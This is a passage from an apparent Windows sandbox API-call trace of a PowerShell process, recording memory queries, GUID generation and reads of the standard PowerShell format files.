__alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.678] VirtualQuery (in: lpAddress=0x24b940, lpBuffer=0x24c800, dwLength=0x30 | out: lpBuffer=0x24c800*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.679] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.679] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.679] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.679] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.680] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x2ef2d909, Data2=0x378e, Data3=0x44a5, Data4=([0]=0x8b, [1]=0x2d, [2]=0x12, [3]=0x50, [4]=0xb5, [5]=0x42, [6]=0xb6, [7]=0x86))) returned 0x0 [0062.680] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x85321fdd, Data2=0x9bc2, Data3=0x4110, Data4=([0]=0x86, [1]=0x90, [2]=0xff, [3]=0x48, [4]=0x81, [5]=0x9a, [6]=0x4f, [7]=0x1f))) returned 0x0 [0062.680] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x317c5705, Data2=0xde3, Data3=0x47c8, Data4=([0]=0xa6, [1]=0x81, [2]=0xdd, [3]=0x5f, [4]=0x14, [5]=0xe8, [6]=0xc9, [7]=0x58))) returned 0x0 [0062.681] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x6ec8bf62, Data2=0xc3ad, Data3=0x401f, Data4=([0]=0x90, [1]=0x6c, [2]=0x89, [3]=0xdf, [4]=0x5d, [5]=0x28, [6]=0xcf, [7]=0x65))) returned 0x0 [0062.681] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xeb2ba598, Data2=0x5a5e, Data3=0x4ccd, Data4=([0]=0x9b, [1]=0x9c, [2]=0xc9, [3]=0xca, [4]=0x39, [5]=0x3c, [6]=0x55, [7]=0x3e))) returned 0x0 [0062.681] VirtualQuery (in: lpAddress=0x24ba50, lpBuffer=0x24c910, dwLength=0x30 | out: lpBuffer=0x24c910*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.681] VirtualQuery (in: lpAddress=0x24bae0, lpBuffer=0x24c9a0, dwLength=0x30 | out: lpBuffer=0x24c9a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.681] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xec649941, Data2=0x9451, Data3=0x4b3e, Data4=([0]=0xa6, [1]=0x55, [2]=0xf1, [3]=0xe5, [4]=0xa9, [5]=0x38, [6]=0x61, [7]=0xa1))) returned 0x0 [0062.682] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xcce8f3c5, Data2=0x691f, Data3=0x4213, Data4=([0]=0xb9, [1]=0x47, [2]=0xd5, [3]=0x71, [4]=0xb0, [5]=0x17, [6]=0xb1, [7]=0x20))) returned 0x0 [0062.682] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x8804d2dc, Data2=0x60c2, Data3=0x485e, Data4=([0]=0xa1, [1]=0xe4, [2]=0x1e, [3]=0x8b, [4]=0xb2, [5]=0xb6, [6]=0x24, [7]=0x44))) returned 0x0 [0062.682] SetErrorMode (uMode=0x1) returned 0x1 [0062.682] SetErrorMode (uMode=0x1) returned 0x1 [0062.683] GetFileType (hFile=0x308) returned 0x1 [0062.683] ReadFile (in: hFile=0x308, lpBuffer=0x3b97dd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3b97dd0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.688] SetErrorMode (uMode=0x1) returned 0x1 [0062.688] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d1e0 | out: lpFileInformation=0x24d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0062.688] SetErrorMode (uMode=0x1) returned 0x1 [0062.693] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x2cbe36a6, Data2=0x8735, Data3=0x4d9e, Data4=([0]=0x81, [1]=0xe, [2]=0x14, [3]=0x4e, [4]=0x74, [5]=0xae, [6]=0x15, [7]=0x3e))) returned 0x0 [0062.693] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x6438e83e, Data2=0x4df8, Data3=0x4961, Data4=([0]=0x8a, [1]=0x3c, [2]=0xeb, [3]=0xc, [4]=0x28, [5]=0x7e, [6]=0xef, [7]=0x88))) returned 0x0 [0062.693] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xd1bb77ce, Data2=0x6b15, Data3=0x423c, Data4=([0]=0xb4, [1]=0x80, [2]=0x54, [3]=0xc8, [4]=0xd3, [5]=0x74, [6]=0xeb, [7]=0xfb))) returned 0x0 [0062.694] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xea24f794, Data2=0xa0c2, Data3=0x4192, Data4=([0]=0xa6, [1]=0xe1, [2]=0x91, [3]=0xb1, [4]=0x7d, [5]=0x6a, [6]=0x85, [7]=0xbd))) returned 0x0 [0062.694] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xafa09ecc, Data2=0xbf34, Data3=0x43a9, Data4=([0]=0x95, [1]=0xde, [2]=0x3d, [3]=0xbf, [4]=0x2f, [5]=0x57, [6]=0xae, [7]=0x9a))) returned 0x0 [0062.694] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xfb881291, Data2=0x22f7, Data3=0x4118, Data4=([0]=0x96, [1]=0x1a, [2]=0x7c, [3]=0x19, [4]=0x98, [5]=0xa4, [6]=0xdf, [7]=0xe1))) returned 0x0 [0062.694] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x34f4677b, Data2=0x99f7, Data3=0x45b2, Data4=([0]=0x86, [1]=0xc4, [2]=0xee, [3]=0xce, [4]=0x92, [5]=0xa0, [6]=0xc1, [7]=0xe0))) returned 0x0 [0062.694] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.694] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xcd7f5560, Data2=0xb896, Data3=0x492b, Data4=([0]=0xa8, [1]=0x1c, [2]=0x3c, [3]=0x4, [4]=0x8, [5]=0x60, [6]=0x7c, [7]=0x93))) returned 0x0 [0062.695] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xe55a496c, Data2=0x307a, Data3=0x479c, Data4=([0]=0xa9, [1]=0x7f, [2]=0x6c, [3]=0x19, [4]=0x35, [5]=0x67, [6]=0x94, [7]=0xb7))) returned 0x0 [0062.695] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xc91258b, Data2=0x836, Data3=0x419b, Data4=([0]=0xbd, [1]=0x1b, [2]=0xa4, [3]=0x1b, [4]=0xb3, [5]=0x33, [6]=0x88, [7]=0x54))) returned 0x0 [0062.695] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x85c08c8c, Data2=0x119d, Data3=0x4df4, Data4=([0]=0x8e, [1]=0x84, [2]=0x47, [3]=0xe, [4]=0x96, [5]=0x87, [6]=0x24, [7]=0x83))) returned 0x0 [0062.695] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x75a9eed2, Data2=0xf1bc, Data3=0x49d3, Data4=([0]=0xa1, [1]=0xac, [2]=0x8f, [3]=0x4a, [4]=0xde, [5]=0x94, [6]=0x2b, [7]=0x95))) returned 0x0 [0062.695] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xace83750, Data2=0xbe11, Data3=0x4e55, Data4=([0]=0xa8, [1]=0x5b, [2]=0x45, [3]=0xbb, [4]=0x66, [5]=0xdd, [6]=0x2e, [7]=0xb7))) returned 0x0 [0062.695] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x425d11fc, Data2=0x1533, Data3=0x425d, Data4=([0]=0x81, [1]=0x7, [2]=0xde, [3]=0x50, [4]=0xe8, [5]=0x77, [6]=0xdc, [7]=0xc3))) returned 0x0 [0062.695] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xdd815b96, Data2=0xb05d, Data3=0x449e, Data4=([0]=0xa9, [1]=0x4e, [2]=0xee, [3]=0x9c, [4]=0x35, [5]=0x19, [6]=0xb6, [7]=0x25))) returned 0x0 [0062.696] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x5f1a0e9, Data2=0xb363, Data3=0x4e9c, Data4=([0]=0x92, [1]=0x49, [2]=0x9e, [3]=0x43, [4]=0x9e, [5]=0xc3, [6]=0x39, [7]=0x9f))) returned 0x0 [0062.696] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa884222a, Data2=0xe449, Data3=0x46f3, Data4=([0]=0x82, [1]=0x91, [2]=0x9f, [3]=0xe1, [4]=0xdf, [5]=0xe1, [6]=0xd1, [7]=0xf5))) returned 0x0 [0062.717] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xb17907e1, Data2=0x6137, Data3=0x446e, Data4=([0]=0x91, [1]=0x91, [2]=0xfe, [3]=0xc4, [4]=0x75, [5]=0xea, [6]=0x95, [7]=0x7e))) returned 0x0 [0062.717] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x29091cd1, Data2=0xc098, Data3=0x4480, Data4=([0]=0xa3, [1]=0xa9, [2]=0xdf, [3]=0xf9, [4]=0x94, [5]=0xfa, [6]=0x38, [7]=0xd5))) returned 0x0 [0062.718] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0062.719] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0062.721] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0062.722] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x3c558a7d, Data2=0x98b3, Data3=0x4239, Data4=([0]=0xaf, [1]=0xb0, [2]=0x2b, [3]=0x65, [4]=0x69, [5]=0xa4, [6]=0x9, [7]=0xc6))) returned 0x0 [0062.722] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x23048f73, Data2=0x640b, Data3=0x4f6b, Data4=([0]=0x9a, [1]=0xcf, [2]=0x3f, [3]=0xe7, [4]=0x9, [5]=0xfd, [6]=0xcc, [7]=0x23))) returned 0x0 [0062.723] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x4b0e37bb, Data2=0x6643, Data3=0x41b5, Data4=([0]=0x9d, [1]=0x3d, [2]=0x31, [3]=0x36, [4]=0x1d, [5]=0x5c, [6]=0xc8, [7]=0x38))) returned 0x0 [0062.723] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x41ec4e1d, Data2=0xf3fc, Data3=0x4d10, Data4=([0]=0xa6, [1]=0x25, [2]=0x5d, [3]=0x8a, [4]=0xca, [5]=0xa, [6]=0x9f, [7]=0x45))) returned 0x0 [0062.723] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x4622d167, Data2=0x9b20, Data3=0x4f76, Data4=([0]=0x99, [1]=0xc, [2]=0x62, [3]=0x45, [4]=0xf3, [5]=0xe7, [6]=0xc4, [7]=0xef))) returned 0x0 [0062.723] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xaa73535a, Data2=0x37ea, Data3=0x4fc1, Data4=([0]=0x97, [1]=0xa0, [2]=0x21, [3]=0xe9, [4]=0x26, [5]=0xd3, [6]=0x1a, [7]=0x4a))) returned 0x0 [0062.723] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x766fa9e4, Data2=0x7cda, Data3=0x4e77, Data4=([0]=0xba, [1]=0x67, [2]=0x16, [3]=0xdf, [4]=0x19, [5]=0x14, [6]=0x72, [7]=0xe5))) returned 0x0 [0062.723] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x25af6aab, Data2=0xa77e, Data3=0x46ee, Data4=([0]=0x96, [1]=0x1e, [2]=0x28, [3]=0x2c, [4]=0xb0, [5]=0x76, [6]=0xba, [7]=0x6))) returned 0x0 [0062.723] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x2d33eab8, Data2=0xfe94, Data3=0x48bd, Data4=([0]=0x8c, [1]=0x72, [2]=0x16, [3]=0x1a, [4]=0xa3, [5]=0xbc, [6]=0xb3, [7]=0x29))) returned 0x0 [0062.723] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x5e7e90e, Data2=0x92d4, Data3=0x45b7, Data4=([0]=0xa8, [1]=0x6e, [2]=0xec, [3]=0x60, [4]=0x56, [5]=0x79, [6]=0xe9, [7]=0x61))) returned 0x0 [0062.724] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xfdb85892, Data2=0x57e0, Data3=0x47a2, Data4=([0]=0xac, [1]=0x1e, [2]=0x90, [3]=0xd9, [4]=0x66, [5]=0x66, [6]=0xb5, [7]=0xde))) returned 0x0 [0062.724] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x7195d106, Data2=0xf074, Data3=0x4a9d, Data4=([0]=0xb0, [1]=0x10, [2]=0xf6, [3]=0x48, [4]=0x97, [5]=0x26, [6]=0x3c, [7]=0x9e))) returned 0x0 [0062.724] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x9ed4166c, Data2=0xa233, Data3=0x4fe5, Data4=([0]=0xa1, [1]=0xb1, [2]=0xcb, [3]=0xab, [4]=0x26, [5]=0xf8, [6]=0x9f, [7]=0x6a))) returned 0x0 [0062.724] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.725] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x81f575f3, Data2=0xcb8f, Data3=0x48d3, Data4=([0]=0xb9, [1]=0x1b, [2]=0xed, [3]=0x8e, [4]=0x94, [5]=0x91, [6]=0x1e, [7]=0xf9))) returned 0x0 [0062.725] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.725] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.726] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x1a6ba226, Data2=0x84ed, Data3=0x406f, Data4=([0]=0x9c, [1]=0x83, [2]=0x52, [3]=0xce, [4]=0xd7, [5]=0x69, [6]=0xb, [7]=0xf1))) returned 0x0 [0062.726] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.726] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x32936e38, Data2=0x8066, Data3=0x4774, Data4=([0]=0x90, [1]=0x3, [2]=0xbb, [3]=0x80, [4]=0x89, [5]=0xfd, [6]=0x6d, [7]=0xd7))) returned 0x0 [0062.726] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xdc145966, Data2=0xc7d1, Data3=0x4e6b, Data4=([0]=0x8e, [1]=0xff, [2]=0x2e, [3]=0x94, [4]=0xa5, [5]=0xf8, [6]=0x64, [7]=0xcf))) returned 0x0 [0062.727] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x8fdb47b, Data2=0xa48c, Data3=0x4695, Data4=([0]=0x98, [1]=0x60, [2]=0xd0, [3]=0x96, [4]=0x56, [5]=0xa3, [6]=0x1, [7]=0xb))) returned 0x0 [0062.727] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xd5759d4b, Data2=0xb10c, Data3=0x46a8, Data4=([0]=0x93, [1]=0x14, [2]=0xc5, [3]=0x5, [4]=0x28, [5]=0x4b, [6]=0xa7, [7]=0x92))) returned 0x0 [0062.727] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x953e9ccf, Data2=0x9b28, Data3=0x45f3, Data4=([0]=0xb4, [1]=0xa2, [2]=0xd1, [3]=0x53, [4]=0xff, [5]=0xe5, [6]=0x20, [7]=0x6a))) returned 0x0 [0062.727] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x65e2b1e, Data2=0x75d7, Data3=0x4451, Data4=([0]=0xa5, [1]=0x82, [2]=0x18, [3]=0x4b, [4]=0xd4, [5]=0x88, [6]=0x53, [7]=0x83))) returned 0x0 [0062.727] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x78e89cc5, Data2=0xc34d, Data3=0x45aa, Data4=([0]=0xa6, [1]=0x10, [2]=0xa4, [3]=0xce, [4]=0x7e, [5]=0x97, [6]=0xad, [7]=0xae))) returned 0x0 [0062.727] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.727] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x4d49417f, Data2=0x6dbd, Data3=0x4afd, Data4=([0]=0xb1, [1]=0x84, [2]=0x42, [3]=0x6, [4]=0xcb, [5]=0x1, [6]=0xcb, [7]=0xae))) returned 0x0 [0062.727] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x5f47776d, Data2=0xbb60, Data3=0x4fc0, Data4=([0]=0xbd, [1]=0x1, [2]=0x92, [3]=0x31, [4]=0x9d, [5]=0x99, [6]=0x7d, [7]=0xc2))) returned 0x0 [0062.728] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x610d7c5e, Data2=0xdcc5, Data3=0x4f82, Data4=([0]=0xae, [1]=0xb7, [2]=0xf0, [3]=0x8b, [4]=0xb8, [5]=0x49, [6]=0x25, [7]=0xe))) returned 0x0 [0062.728] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x2d4b9655, Data2=0xe5ba, Data3=0x493f, Data4=([0]=0x9c, [1]=0x52, [2]=0x84, [3]=0x64, [4]=0x81, [5]=0x28, [6]=0xe4, [7]=0x62))) returned 0x0 [0062.728] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x2f4c2385, Data2=0xac05, Data3=0x4f20, Data4=([0]=0x95, [1]=0x1, [2]=0x71, [3]=0x72, [4]=0x14, [5]=0xf5, [6]=0x78, [7]=0x6b))) returned 0x0 [0062.728] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.728] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x1cc142b7, Data2=0x4b6e, Data3=0x4238, Data4=([0]=0x8d, [1]=0xa4, [2]=0x6a, [3]=0x58, [4]=0x46, [5]=0x65, [6]=0xe, [7]=0x96))) returned 0x0 [0062.728] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xb85ede5c, Data2=0xffdf, Data3=0x43ba, Data4=([0]=0x83, [1]=0x1a, [2]=0xc2, [3]=0x31, [4]=0xff, [5]=0xa5, [6]=0xc9, [7]=0xcc))) returned 0x0 [0062.728] VirtualQuery (in: lpAddress=0x24bf10, lpBuffer=0x24cdd0, dwLength=0x30 | out: lpBuffer=0x24cdd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.728] VirtualQuery (in: lpAddress=0x24bf10, lpBuffer=0x24cdd0, dwLength=0x30 | out: lpBuffer=0x24cdd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.728] VirtualQuery (in: lpAddress=0x24bf10, lpBuffer=0x24cdd0, dwLength=0x30 | out: lpBuffer=0x24cdd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.729] VirtualQuery (in: lpAddress=0x24bf10, lpBuffer=0x24cdd0, dwLength=0x30 | out: lpBuffer=0x24cdd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0062.729] SetErrorMode (uMode=0x1) returned 0x1 [0062.729] SetErrorMode (uMode=0x1) returned 0x1 [0062.729] GetFileType (hFile=0x304) returned 0x1 [0062.729] ReadFile (in: hFile=0x304, lpBuffer=0x34da468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34da468*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.732] ReadFile (in: hFile=0x304, lpBuffer=0x34da468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34da468*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.732] ReadFile (in: hFile=0x304, lpBuffer=0x34da468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34da468*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.732] ReadFile (in: hFile=0x304, lpBuffer=0x34da468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34da468*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.732] ReadFile (in: hFile=0x304, lpBuffer=0x34da468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34da468*, lpNumberOfBytesRead=0x24d238*=0x8b4, lpOverlapped=0x0) returned 1 [0062.732] ReadFile (in: hFile=0x304, lpBuffer=0x34d9884, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34d9884*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1 [0062.732] ReadFile (in: hFile=0x304, lpBuffer=0x34da468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34da468*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1 [0062.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0062.733] SetErrorMode (uMode=0x1) returned 0x1 [0062.733] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d1e0 | out: lpFileInformation=0x24d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 